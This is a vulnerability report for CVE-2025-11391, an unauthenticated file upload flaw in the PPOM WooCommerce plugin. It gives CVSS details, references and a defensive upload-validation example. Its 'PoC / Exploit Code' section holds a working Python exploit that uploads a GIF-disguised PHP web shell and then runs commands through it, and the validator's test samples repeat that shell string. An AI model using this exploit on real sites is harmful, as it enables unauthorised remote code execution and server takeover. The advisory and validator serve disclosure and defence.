Security Vulnerability Report
CVE-2025-11391 CVSS 9.8 CRITICAL

Published: 2025-10-18 07:15:35
Last Modified: 2026-04-15 00:35:42

Description

The PPOM – Product Addons & Custom Fields for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the image cropper functionality in all versions up to, and including, 33.0.15. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. While the vulnerable code is in the free version, this only affected users with the paid version of the software installed and activated.
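The check the description says is missing (file type validation on the image cropper upload), as an added example that is not code from the CVE record or from the PPOM plugin: an upload is accepted only if its single extension is an image type, the content starts with that type's magic bytes, and no PHP open tag appears anywhere in the body, so a "GIF89a"-prefixed PHP file of the kind used in the PoC below is refused. The allowlist, function names and sample inputs are constructed for this example.

```python
import re

# Image types an upload handler should accept and their magic bytes (constructed allowlist)
ALLOWED_IMAGE_TYPES = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
}
# A PHP open tag anywhere in an "image" marks a polyglot; short tags included
PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)

def validate_image_upload(filename, data):
    """Return (accepted, reason) for a candidate upload."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if "." not in name:
        return False, "no extension"
    if name.count(".") > 1:  # refuses shell.php.gif style double extensions
        return False, "multiple extensions"
    ext = name.rsplit(".", 1)[1]
    if ext not in ALLOWED_IMAGE_TYPES:
        return False, f"extension .{ext} not an allowed image type"
    # Magic bytes must match the claimed type, not just be any image header
    if not any(data.startswith(m) for m in ALLOWED_IMAGE_TYPES[ext]):
        return False, f"content does not match .{ext} magic bytes"
    # Valid magic is not enough: GIF89a followed by PHP is still a script
    if PHP_TAG.search(data):
        return False, "PHP open tag found inside image data"
    return True, "ok"

def triage_uploads(samples):
    """Apply the check to {filename: bytes} and return a verdict per file."""
    verdicts = {}
    for name, content in samples.items():
        accepted, reason = validate_image_upload(name, content)
        verdicts[name] = "accept" if accepted else f"reject: {reason}"
    return verdicts

# Constructed samples shaped like the PoC payload, plus a genuine 1x1 GIF
SAMPLES = {
    "shell.php": b"GIF89a\x01\x00\x01\x00\x00\x00\x00;\n<?php system($_GET['cmd']); ?>",
    "avatar.php.gif": b"GIF89a;<?php echo 1; ?>",
    "polyglot.gif": b"GIF89a\x01\x00\x01\x00\x00\x00\x00;\n<?php echo 'x'; ?>",
    "pixel.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
                 b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;",
    "wrong_magic.png": b"GIF89a;",
}

if __name__ == "__main__":
    for name, verdict in triage_uploads(SAMPLES).items():
        print(f"{name}: {verdict}")
```

Only pixel.gif is accepted; each of the other samples is refused by a different one of the three checks, which is why none of them can be dropped on its own.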

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

woocommerce-product-addon (PPOM) <= 33.0.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-11391 PoC - PPOM Plugin Arbitrary File Upload
# This PoC demonstrates the arbitrary file upload vulnerability in PPOM plugin's image cropper functionality
import requests

TARGET_URL = "http://target-wordpress-site.com"
SHELL_CONTENT = b"GIF89a;\n<?php system($_GET['cmd']); ?>"

# Step 1: Create a malicious file disguised as a GIF image
# The GIF89a header helps bypass basic file type checks
malicious_file = (
    b"GIF89a\x01\x00\x01\x00\x00\x00\x00;\n"  # GIF header
    b"<?php echo 'VULNERABLE'; system($_GET['cmd']); ?>"
)

# Step 2: Upload the malicious file via PPOM image cropper endpoint
# The endpoint is typically accessible without authentication
upload_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
payload = {
    "action": "ppom_upload_image",
    "ppom_product_id": "1",
}
files = {
    "ppom_file": ("shell.php", malicious_file, "image/gif")
}

# Step 3: Send the upload request
response = requests.post(upload_url, data=payload, files=files)
print(f"Upload response: {response.status_code}")
print(f"Response body: {response.text}")

# Step 4: Access the uploaded shell to execute commands
# The file is typically saved in /wp-content/uploads/ppom/
shell_url = f"{TARGET_URL}/wp-content/uploads/ppom/shell.php?cmd=id"
response = requests.get(shell_url)
print(f"Shell execution result: {response.text}")
```

References

https://plugins.trac.wordpress.org/browser/woocommerce-product-addon/trunk/inc/hooks.php#L45
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3379431%40woocommerce-product-addon&new=3379431%40woocommerce-product-addon&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/cf851bed-f5d8-44e2-810d-906ba3d3c1c5?source=cve

Weakness

CWE-434 (Unrestricted Upload of File with Dangerous Type)

NVD Record Status

Deferred (exploitability score 3.9, impact score 5.9)